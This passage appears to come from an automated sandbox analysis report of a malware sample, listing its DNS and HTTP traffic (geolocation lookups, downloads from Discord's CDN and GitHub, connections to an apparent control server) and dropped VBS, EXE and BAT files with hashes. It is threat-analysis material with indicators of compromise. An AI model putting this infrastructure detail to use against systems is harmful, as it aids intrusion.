                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          ocsp.digicert.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          ocsp.edge.digicert.com
                                                                                                                                                                                                                                                                                                                                                                                                          ocsp.edge.digicert.com
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          cac-ocsp.digicert.com.edgekey.net
                                                                                                                                                                                                                                                                                                                                                                                                          cac-ocsp.digicert.com.edgekey.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                                                                                          e3913.cd.akamaiedge.net
                                                                                                                                                                                                                                                                                                                                                                                                          e3913.cd.akamaiedge.net
                                                                                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                                                                                          104.78.173.167
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          233.129.159.162.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          233.129.159.162.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                                                                                          131.153.100.95.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          131.153.100.95.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          131.153.100.95.in-addr.arpa
                                                                                                                                                                                                                                                                                                                                                                                                          IN PTR
                                                                                                                                                                                                                                                                                                                                                                                                          a95-100-153-131deploystaticakamaitechnologiescom
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-gb
                                                                                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                                                                                          http://c.pki.goog/r/gsr1.crl
                                                                                                                                                                                                                                                                                                                                                                                                          Hsjdosj.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          142.250.187.227:80
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          GET /r/gsr1.crl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                                                                                                                                                                                                                          Host: c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1739
                                                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 31 Mar 2025 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 31 Mar 2025 17:19:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=3000
                                                                                                                                                                                                                                                                                                                                                                                                          Age: 901
                                                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-gb
                                                                                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                                                                                          http://c.pki.goog/r/r4.crl
                                                                                                                                                                                                                                                                                                                                                                                                          Hsjdosj.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          142.250.187.227:80
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          GET /r/r4.crl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                                                                                                                                                                                                                                                                                                                                          Host: c.pki.goog
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 436
                                                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 31 Mar 2025 16:29:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 31 Mar 2025 17:19:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=3000
                                                                                                                                                                                                                                                                                                                                                                                                          Age: 856
                                                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                                                                                          http://ip-api.com/json/
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                                                                                          208.95.112.1:80
                                                                                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                                                                                          GET /json/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                                                                                                                                                                                                                                                                                                                                                                          Host: ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 31 Mar 2025 16:44:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 288
                                                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                          X-Ttl: 57
                                                                                                                                                                                                                                                                                                                                                                                                          X-Rl: 37
                                                                                                                                                                                                                                                                                                                                                                                                        • 85.215.222.129:43240
                                                                                                                                                                                                                                                                                                                                                                                                          Oajujxo.exe
                                                                                                                                                                                                                                                                                                                                                                                                          260 B
                                                                                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                                                                                        • 208.95.112.1:80
                                                                                                                                                                                                                                                                                                                                                                                                          http://ip-api.com/json/
                                                                                                                                                                                                                                                                                                                                                                                                          http
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          374 B
                                                                                                                                                                                                                                                                                                                                                                                                          557 B
                                                                                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                                                                                          2

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                                                                                          GET http://ip-api.com/json/

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                                                                                        • 185.199.110.133:443
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          tls
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          840 B
                                                                                                                                                                                                                                                                                                                                                                                                          6.6kB
                                                                                                                                                                                                                                                                                                                                                                                                          8
                                                                                                                                                                                                                                                                                                                                                                                                          8
                                                                                                                                                                                                                                                                                                                                                                                                        • 162.159.129.233:443
                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com
                                                                                                                                                                                                                                                                                                                                                                                                          tls
                                                                                                                                                                                                                                                                                                                                                                                                          Hsjdosj.exe
                                                                                                                                                                                                                                                                                                                                                                                                          2.7kB
                                                                                                                                                                                                                                                                                                                                                                                                          6.7kB
                                                                                                                                                                                                                                                                                                                                                                                                          14
                                                                                                                                                                                                                                                                                                                                                                                                          12
                                                                                                                                                                                                                                                                                                                                                                                                        • 142.250.187.227:80
                                                                                                                                                                                                                                                                                                                                                                                                          http://c.pki.goog/r/r4.crl
                                                                                                                                                                                                                                                                                                                                                                                                          http
                                                                                                                                                                                                                                                                                                                                                                                                          Hsjdosj.exe
                                                                                                                                                                                                                                                                                                                                                                                                          510 B
                                                                                                                                                                                                                                                                                                                                                                                                          3.8kB
                                                                                                                                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                                                                                                                                          5

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                                                                                          GET http://c.pki.goog/r/gsr1.crl

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                                                                                          200

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                                                                                          GET http://c.pki.goog/r/r4.crl

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                                                                                        • 208.95.112.1:80
                                                                                                                                                                                                                                                                                                                                                                                                          http://ip-api.com/json/
                                                                                                                                                                                                                                                                                                                                                                                                          http
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          328 B
                                                                                                                                                                                                                                                                                                                                                                                                          557 B
                                                                                                                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                                                                                                                          2

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                                                                                          GET http://ip-api.com/json/

                                                                                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                                                                                        • 85.215.222.129:65535
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          260 B
                                                                                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                                                                                        • 95.100.153.131:443
                                                                                                                                                                                                                                                                                                                                                                                                          www.bing.com
                                                                                                                                                                                                                                                                                                                                                                                                          tls
                                                                                                                                                                                                                                                                                                                                                                                                          1.5kB
                                                                                                                                                                                                                                                                                                                                                                                                          7.8kB
                                                                                                                                                                                                                                                                                                                                                                                                          18
                                                                                                                                                                                                                                                                                                                                                                                                          15
                                                                                                                                                                                                                                                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                                                                                          dns
                                                                                                                                                                                                                                                                                                                                                                                                          Images.exe
                                                                                                                                                                                                                                                                                                                                                                                                          376 B
                                                                                                                                                                                                                                                                                                                                                                                                          854 B
                                                                                                                                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                                                                                                                                          6

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          ip-api.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          208.95.112.1

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          cdn.discordapp.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          162.159.129.233
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.130.233
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.133.233
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.135.233
                                                                                                                                                                                                                                                                                                                                                                                                          162.159.134.233

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          ctldl.windowsupdate.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          199.232.210.172
                                                                                                                                                                                                                                                                                                                                                                                                          199.232.214.172

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          c.pki.goog

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          142.250.187.227

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          133.110.199.185.in-addr.arpa

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          arc.msn.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          20.31.169.57

                                                                                                                                                                                                                                                                                                                                                                                                        • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                                                                                          dns
                                                                                                                                                                                                                                                                                                                                                                                                          Gptmvmjkvvg.exe
                                                                                                                                                                                                                                                                                                                                                                                                          412 B
                                                                                                                                                                                                                                                                                                                                                                                                          1.0kB
                                                                                                                                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                                                                                                                                          6

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          185.199.110.133
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.111.133
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.109.133
                                                                                                                                                                                                                                                                                                                                                                                                          185.199.108.133

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          1.112.95.208.in-addr.arpa

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          login.live.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          20.190.159.130
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.131
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.71
                                                                                                                                                                                                                                                                                                                                                                                                          20.190.159.0
                                                                                                                                                                                                                                                                                                                                                                                                          20.190.159.2
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.3
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.0
                                                                                                                                                                                                                                                                                                                                                                                                          40.126.31.73

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          ocsp.digicert.com

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Response

                                                                                                                                                                                                                                                                                                                                                                                                          104.78.173.167

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          233.129.159.162.in-addr.arpa

                                                                                                                                                                                                                                                                                                                                                                                                          DNS Request

                                                                                                                                                                                                                                                                                                                                                                                                          131.153.100.95.in-addr.arpa

                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Execution.vbs

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          395B

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          ed60a6e229318430f77c588101134ab3

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          999aca0f516558c0ce3b501b0e0ac172c1304161

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          5cc8563947de29db37a6c6eda475c993246f054f56ddc34893ccaef9188f10b9

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          dc6ee59d582cec837eb89b9327f08da60980dcdde3c6ce4c6a6a20b59ecfda3b6a5a9e2d17b06536172a0c5d1cd739a81fb899ca4c86996d823daa1407abdea3

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Execution2.vbs

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          711B

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          165f73dc3352b322003dac336356a4dd

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          db064f1272024f22892e4164d3d90f08d47776a9

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          cfe26c1974b281174e137a76720270b1a1b46529974d35a0ca0e7d436cab9e4c

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          2c09f15443eff40940ccabcc1642f65af057bb9de1a9e884ba8cfe854b3e40e1fee3af29307dfb8c916aafeb0e8cdfbd7c6b90ddcc1b9c1c664ce488c483bf31

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Execution5.vbs

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          443B

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          82d0aab78d68e662a3c836e45a50283e

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          a58dfc74331ce3958a021b02060f3e05523ed755

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          442ea26f0245897bda778c22b58c76d34e402e3c5f31af550bfb161c5febd633

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          ddf0d379bbd3d1dbb3ffb75a9dccf7c9e29b8562cf1674fb3d0a75112382849d0d6e3aae35115925ef4215aca2d6e98d9a522e95ac443c8d7a76f8132165507a

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Gptmvmjkvvg.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          67697eab79812fe4280d526bcf735dd7

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          5658c7549bb67fa50e4f4825cf3db2d81137ed99

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          0d026c7e468b9b734d9e57842fdcfa0028fa31e35b1c0af693fbfc5e54d876ac

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          6eb47c9a1540e83e2ec5b2611a5d15dc8a63ebf8dd5167620820b4ad20abbb9a20e1783cb21c380de97c7852bc7db44a95f560b1dace3cc2b8a847faacf8501b

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Images.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          701B

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          a0c99cab2d0348a3d06a8ed2ac281be9

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          abe85b62a3e758c71585a0be2ca133f4928d8242

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          ed6940279bac21a6da297553ce2fc88d123c45428326418531c922d3c8bd4959

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          19d2d3004fba1debe3ef7df8c7705fe50ef7174f64d1899464005b34840c95f1a9d02b8de3cf7f0a3ee8a303182a1b4a0186e69252c6a133ba7c355235ecd46b

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          916KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          20e5bc2c26788de1138995f9fa2ad7c5

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          4f909c814bba89f6058222d2658cc2123b39c463

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          594c9dc2d16dca813d55528ec60f84711ca58e828818eb31d42d8d99690eba44

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          5c634f834200ce33e8f1ab3e79ba34dc4ac28af780e6cfd4884abefdde85a14d006c0046a658843bd44baf29bb88700e764bcf4000a258edbfff96b533b66bde

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          3.2MB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          2ed95abbfe15c8d0f125b64d8687faa2

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          37b83c14d0c89d7d328a7954b415cff8b0ce257a

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          5e8c4b41430a6ee2d3f72ddd41a5a9f5e6484a8ee143b404e1f45ca645802f30

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          f3e44541ecd5688795e44d8a27d7d968d54d84acdb94b707ad911a6635d0186f73efcaf2128946dcc7e8984bf3a0049ee33a048bb0127b1185a827e20eb4a575

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          95KB

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          8f9a88eab3424835c4c3cd45142c1da1

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          a85396cdd944f2f486597a65f8a46425922c30c0

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          2efec2e1440efee7fb641d8468d6676456197eb50ef49236c081e0827f455909

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          10a625ea39d82707bfe94d35551818410d5564d1562d59b2e624b2ba29683732e434cd62694dbb681e31d67e2af750147c400dba63db088a4a8ee09326807b95

                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\りメノひ丂ん乃刀フ√ズひゐキんレ.bat

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          587B

                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                          fc782d5cfa00740d9605f2362f5f613b

                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                          14fc9451edee1b55f9a387dacc64806cfd8197bc

                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                          2fef95db544b0f30752aaf85187202fbc59cab061347a50d5a7ec2f7360ce202

                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                          9739e471f5ca3f9b9ec26c56b0b10dbce46bd11f3971690ff9ebed75851172b2edc9449686b1a928afb31bfedca4669f18cf05c7a8a0ee6538d4d9ea68f195e9

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2680-81-0x0000000003050000-0x0000000003086000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          216KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2680-82-0x0000000005BB0000-0x00000000061DA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          6.2MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3396-37-0x00000000000E0000-0x00000000000FE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3396-40-0x00000000050B0000-0x00000000056C8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3396-45-0x0000000004AD0000-0x0000000004B1C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3396-41-0x0000000004A20000-0x0000000004A32000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3396-42-0x0000000004A90000-0x0000000004ACC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3396-46-0x0000000004D30000-0x0000000004E3A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3840-35-0x0000000000900000-0x00000000009EC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

